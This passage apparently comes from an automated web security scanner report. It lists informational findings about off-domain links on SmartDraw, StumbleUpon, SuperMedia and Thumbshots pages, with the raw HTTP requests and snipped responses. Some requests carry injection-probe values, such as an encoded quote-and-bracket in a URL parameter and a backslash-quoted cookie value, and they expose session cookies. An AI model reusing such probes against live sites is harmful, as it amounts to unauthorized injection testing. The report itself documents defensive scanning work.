<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Top+2011+Destinations%3a+South+Africa&amp;cid=msntab1173216&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/77/8BBE719188215E714C209628E2A613.jpg" title="Image: View from Skeppsholmen Bridge of Gamla Stan (Old Town), Stockholm, Sweden (.. Canali Pietro/SIME/4Coreners Images)" width="128" height="73" alt="Image: View from Skeppsholmen Bridge of Gamla Stan (Old Town), Stockholm, Sweden (.. Canali Pietro/SIME/4Coreners Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Top+2011+Destinations%3a+South+Africa&amp;cid=msntab1173216&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Our picks for <a href="http://www.bing.com/travel/content/search?q=Top+2011+Destinations%3a+South+Africa&amp;cid=msntab1173216&amp;FORM=TRVCON">hot spots</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&amp;cid=msntab1138076&amp;form=TRVCON">15 of the world's cheapest travel destinations</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&amp;cid=msntab1176852&amp;form=TRVCON">Get a real taste of San Francisco's Chinatown</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&amp;cid=msn1176225&amp;FORM=TRVCON">Strange &amp; breathtaking beaches around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&amp;cid=msntab1175092&amp;form=TRVCON">Turn your New Year's resolution into a vacation</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Begin your hotel search with Bing</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&amp;q=orlando+hotels&amp;cid=msn_tab&amp;form=trvcon">Orlando hotel deals</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon">Find great deals for your 2011 travels</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&amp;form=trvcon">Cheap flights to Las Vegas</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Discover a new destination</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&amp;cid=msnsp1176403&amp;form=TRVCON&amp;gt1=41000"><img src="http://col.stb.s-msn.com/i/C1/AD8545A3FFAD69A813623068C56453.jpg" title="Image: Surf simulator at Avalanche Bay in Boyne, Mich. (Courtesy of Avalanche Bay)" width="75" height="128" alt="Image: Surf simulator at Avalanche Bay in Boyne, Mich. (Courtesy of Avalanche Bay)" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&amp;cid=msnsp1176403&amp;form=TRVCON&amp;gt1=41000">Top 10 indoor water parks</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msnsp1176778&amp;FORM=TRVCON&amp;gt1=41000">What's new in the world of Disney?</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/content/search?q=Cruise+Trends%3a+The+Incredible+Hull&amp;cid=msnsp1176571&amp;form=TRVCON&amp;gt1=41000">Fun new cruise ships &amp; trips</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/content/search?q=Travel+Like+a+Pirate%3a+Sea+Dragon+Pirate+Cruise&amp;cid=msnsp1162571&amp;form=TRVCON&amp;gt1=41000 ">Yo, ho, ho! Travel like a pirate</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel/content/search?q=Wacky+Cruise+Activities&amp;cid=msnsp1127745&amp;form=TRVCON&amp;gt1=41000">Wacky fun for your next cruise</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

18.126. http://www.smartdraw.com/specials/sd/buy-sd.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5zkkljvslnwzhn45lpwxmzbt; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=C1D264C9-C363-4ED4-8A85-F2E04A6A067E; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9982
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</param><embed src="http://www.youtube.com/v/s2GgoAC2cU0&hl=en_US&fs=1&rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed>
...[SNIP]...
<br />
               <a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy" rel="nofollow" target="_blank"><img src="/images/facebook_button.gif" width="22" height="22" alt="Share on Facebook" border="0" /></a>
               <a href="http://twitter.com/?status=Check out this page: http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy via @SmartDraw" rel="nofollow" target="_blank"><img src="/images/twitter_button.gif" width="22" height="22" alt="Tweet this" border="0" /></a>
               <a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy" rel="nofollow" target="_blank"><img src="/images/linkedin_button.gif" width="22" height="22" alt="Share on LinkedIn" border="0" /></a>
               <a href="http://reddit.com/submit?url=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy" rel="nofollow" target="_blank"><img src="/images/reddit_button.gif" width="22" height="22" alt="Submit to Reddit" border="0" /></a>
               <a href="http://digg.com/submit?url=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy" rel="nofollow" target="_blank"><img src="/images/digg_button.gif" width="22" height="22" alt="Submit to Digg" border="0" /></a>
               <a href="http://delicious.com/post?url=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy" rel="nofollow" target="_blank"><img src="/images/delicious_button.gif" width="22" height="22" alt="Post on Delicious" border="0" />
...[SNIP]...
<div id="like">
               <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/sd/buy-sd.htm?id=343769/x22/x3eBuy&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...

18.127. http://www.smartdraw.com/specials/smartdraw.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /specials/smartdraw.asp?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:00 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iau142zloiyed5iib230qb45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=B2E097C8-DC11-43E2-8B1F-C0B21B9CB9C9; expires=Sun, 03-Feb-2041 20:29:00 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13365
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB1 -->
       <meta http-equiv="Co
...[SNIP]...
<div id="share">
               <a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22" rel="nofollow" target="_blank"><img src="/images/facebook_button.gif" width="22" height="22" alt="Share on Facebook" border="0" /></a>
               <a href="http://twitter.com/?status=Check out this page: http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22 via @SmartDraw" rel="nofollow" target="_blank"><img src="/images/twitter_button.gif" width="22" height="22" alt="Tweet this" border="0" /></a>
               <a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22" rel="nofollow" target="_blank"><img src="/images/linkedin_button.gif" width="22" height="22" alt="Share on LinkedIn" border="0" /></a>
               <a href="http://reddit.com/submit?url=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22" rel="nofollow" target="_blank"><img src="/images/reddit_button.gif" width="22" height="22" alt="Submit to Reddit" border="0" /></a>
               <a href="http://digg.com/submit?url=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22" rel="nofollow" target="_blank"><img src="/images/digg_button.gif" width="22" height="22" alt="Submit to Digg" border="0" /></a>
               <a href="http://delicious.com/post?url=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22" rel="nofollow" target="_blank"><img src="/images/delicious_button.gif" width="22" height="22" alt="Post on Delicious" border="0" />
...[SNIP]...
<div id="like">
               <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...

18.128. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4 HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=hg5a05cgetb3bt0va9ic40kr05; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=1139377904d4b1cf10f9932.82855274; expires=Sat, 05-Mar-2011 21:24:01 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:24:01 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:24:01 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=2fe071ff524700b42a2217d54a1c7a3f%7C%7C10%7C%7C1296768241%7C09255f73ac72e8005bb55b2bf9190e0b; expires=Sun, 31-Jan-2021 21:24:01 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49136
Date: Thu, 03 Feb 2011 21:24:01 GMT
X-Varnish: 508011223
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />
       
           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110203" type="text/css" media="screen, projection" />
       <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
       
               
               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
       
       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110203"></script>
       <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />
       
   
               <title>
...[SNIP]...
<noscript>
               <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
           </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...
<!-- end wrapper -->
       
       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110203"></script>
...[SNIP]...

18.129. http://www.supermedia.com/spportal/landingpages.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/landingpages.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /spportal/landingpages.do?splash=406 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 5027
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperMedia
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://Superpagesadvert.122.2o7.net/b/ss/Superpagesadvert/1/H.14--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

18.130. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c8802F9A8-C462-258E-E590-E3B137E0D296_k3625B42E-760E-9F2A-8486-CF18E62E9A5C HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:47 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24633


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/00asup_SigninbuttonPage_10" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<a href="http://www.boldchat.com" title="Live Chat" target="_blank">
   <img alt="Live Chat" src="https://vms.boldchat.com/aid/3760177095415339810/bc.vmi?wdid=798708614246318013&amp;vr=visitorReference&amp;vi=&amp;vn=&amp;vp=&amp;ve=&amp;curl=" border="0" width="1" height="1" /></a>
...[SNIP]...

18.131. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c1C850D3B-7918-8B5A-3A7C-12FE24C8265C_kE80B27E8-61A2-6AF8-1D53-97B5D03465C5 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/support/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296764274|check#true#1296762474; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:46:31 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 33099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Service Contacts | SuperMedia.com Advertising</title>



...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe>
...[SNIP]...
<td align="center"><a title="chat now" href="https://livechat.boldchat.com/aid/3760177095415339810/bc.chat?cwdid=4559243144402517436&amp;wdid=798708614246318013&amp;rdid=3555529422676032628&amp;vr=&amp;vn=&amp;vi=&amp;ve=&amp;vp=&amp;iq=&amp;curl=" target="_blank" onClick="window.open('https://livechat.boldchat.com/aid/3760177095415339810/bc.chat?cwdid=4559243144402517436&amp;wdid=798708614246318013&amp;rdid=3555529422676032628&amp;vr=&amp;vn=&amp;vi=&amp;ve=&amp;vp=&amp;iq=&amp;curl=&amp;url=' + escape(document.location.href), 'Chat3542406778162144599', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=640,height=480');return false;"><img alt="Live chat by BoldChat" src="https://cbi.boldchat.com/aid/3760177095415339810/bc.cbi?cbdid=3742349473228758156&amp;wdid=798708614246318013&amp;rdid=3555529422676032628" border="0" onload="if(this.height!='1'){$('#chatmsg').show()};"/></a>
...[SNIP]...
<a href="http://www.boldchat.com" title="Live Chat" target="_blank">
   <img alt="Live Chat" src="https://vms.boldchat.com/aid/3760177095415339810/bc.vmi?wdid=798708614246318013&amp;vr=visitorReference&amp;vi=&amp;vn=&amp;vp=&amp;ve=&amp;curl=" border="0" width="1" height="1" /></a>
...[SNIP]...

18.132. http://www.thumbshots.net/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.net
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.aspx?q= HTTP/1.1
Host: www.thumbshots.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=ezpDrHr6ywEkAAAAZDNlNWYyZDQtMzg4Yy00NmI1LTg2NGUtZDhmNjVhY2M1ZGU00; expires=Thu, 14-Apr-2011 08:05:09 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=ezpDrHr6ywEkAAAAZDNlNWYyZDQtMzg4Yy00NmI1LTg2NGUtZDhmNjVhY2M1ZGU00; expires=Thu, 14-Apr-2011 08:05:09 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:25:08 GMT
Connection: close
Content-Length: 26222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<noscript>
   <a href="http://seomon.com/" target="_top" title="Free Search Engine Marketing Company"><img src="http://seomon.com/prgigbyiybhihoip387308.gif?njs=1" alt="Web Monitoring" border="0" height="83" width="88"></a>
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
<noscript>Get the <a href="http://www.widgetbox.com/widget/youtube-broadcast-yourself-smartdevil">YouTube            - Broadcast Yourself.</a> widget and many other <a href="http://www.widgetbox.com/">great free widgets</a> at <a href="http://www.widgetbox.com">Widgetbox</a>! Not seeing a widget? (<a href="http://docs.widgetbox.com/using-widgets/installing-widgets/why-cant-i-see-my-widget/">More info</a>
...[SNIP]...

18.133. http://www.thumbshots.net/webguide.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.net
Path:   /webguide.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webguide.aspx?cat=Arts%2fAnimation%2fAnime%2fMultimedia%2fFull_Episodes HTTP/1.1
Host: www.thumbshots.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=2ooTqHr6ywEkAAAAM2VkMDA3MWItYWZiMS00OWE3LWE2NTctZTFkNzc3NjcyMjRj0; expires=Thu, 14-Apr-2011 08:05:02 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .THUMBSHOTSNETASPXANONYMOUS=2ooTqHr6ywEkAAAAM2VkMDA3MWItYWZiMS00OWE3LWE2NTctZTFkNzc3NjcyMjRj0; expires=Thu, 14-Apr-2011 08:05:02 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:25:06 GMT
Connection: close
Content-Length: 56746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl00_Hyperlink5" href="http://a.scarywater.net/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fa.scarywater.net%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl00_Hyperlink6" href="http://a.scarywater.net/">A.Scarywater.Net</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl01_Hyperlink5" href="http://www.anime-direct.com">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.anime-direct.com' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl01_Hyperlink6" href="http://www.anime-direct.com">Anime-Direct</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl02_Hyperlink5" href="http://www.animedistro.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.animedistro.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl02_Hyperlink6" href="http://www.animedistro.com/">AnimeDistro</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl03_Hyperlink5" href="http://animenuke.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fanimenuke.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl03_Hyperlink6" href="http://animenuke.com/">AnimeNuke</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl04_Hyperlink5" href="http://www.animesuki.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.animesuki.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl04_Hyperlink6" href="http://www.animesuki.com/">AnimeSuki.com</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl05_Hyperlink5" href="http://bt.base0.net/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fbt.base0.net%2f' alt="Preview by Thumbshots.org" />
